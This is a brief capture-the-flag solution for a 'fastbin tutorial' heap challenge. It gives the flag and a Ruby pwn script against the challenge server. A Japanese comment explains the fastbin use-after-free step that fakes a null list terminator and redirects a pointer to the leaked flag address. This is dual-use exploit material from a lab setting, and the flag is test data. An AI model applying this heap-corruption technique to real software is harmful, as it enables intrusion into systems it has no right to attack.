fastbin tutorial
FLAG{KosenCTF{y0ur_n3xt_g0al_is_t0_und3rst4nd_fastbin_corruption_attack_m4yb3}
Exploit
code:exploit.rb
require 'pwn'
context.arch = 'amd64'
# context.log_level = :debug
s = Sock.new 'pwn.kosenctf.com', 9001
s.recvuntil "located at "
flag_addr = s.recvuntil(".").hex
puts s.recvuntil ">"
s.send "1\nA\n"
puts s.recvuntil ">"
s.send "1\nB\n"
puts s.recvuntil ">"
s.send "2\nB\n"
puts s.recvuntil ">"
s.send "2\nA\n"
puts s.recvuntil ">"
s.send "4\nA\n"
puts s.recvuntil ">"
s.send "#{p64(0)}#{p64(flag_addr)}\n" # use after free; flag_addrのみだとなんかoverheadがどうこう言ってくるので、linked listの終端に偽装して(nullptr) stringのポインタかなんかを書き換えた
puts s.recvuntil ">"
s.send "1\nA\n"
puts s.recvuntil ">"
s.send "1\nB\n"
puts s.recvuntil ">"
s.send "1\nC\n"
puts s.recvuntil ">"
s.send "3\nC\n"